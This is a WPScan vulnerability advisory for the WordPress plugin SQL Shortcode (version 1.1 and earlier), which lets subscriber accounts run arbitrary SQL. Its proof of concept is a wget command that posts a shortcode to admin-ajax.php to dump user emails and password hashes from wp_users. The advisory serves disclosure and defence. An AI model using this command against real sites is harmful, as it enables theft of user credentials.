SQL Shortcode <= 1.1 - Authenticated SQL Execution

Sign up to our free email alerts service for instant vulnerability notifications!

Description
It's not an SQL injection actually, it's just executing SQL with an account as low-privileged as a subscriber. The plugin description says it all.

This (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) great article will help understanding how to exploit shortcodes and why this works.

Vulnerabilities:

Execute whatever SQL you want to execute.

Found by:

Paul Dannewitz

Other vulnerabilities I submitted to wpvulndb: https://wpvulndb.com/search?utf8=%E2%9C%93&text=Paul+Dannewitz
Proof of Concept
wget --load-cookies cookie_file_with_cookies_of_just_a_subscriber_account.txt --post-data="action=parse-media-shortcode&shortcode=[sql]SELECT user_email, user_pass FROM wp_users[/sql]" wordpress.app/wp-admin/admin-ajax.php

Make sure the cookie file has the right format (Netscape), useful converter: http://crdx.org/misc/cookies/

Affects Plugin

References

URL https://wordpress.org/plugins/sql-shortcode/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Paul Dannewitz
Submitter Twitter padannewitz
Views 11
Verified No
WPVDB ID 8904

Timeline

Publicly Published 2017-09-02 (about 2 months ago)
Added 2017-09-20 (about 1 month ago)
Last Updated 2017-09-20 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.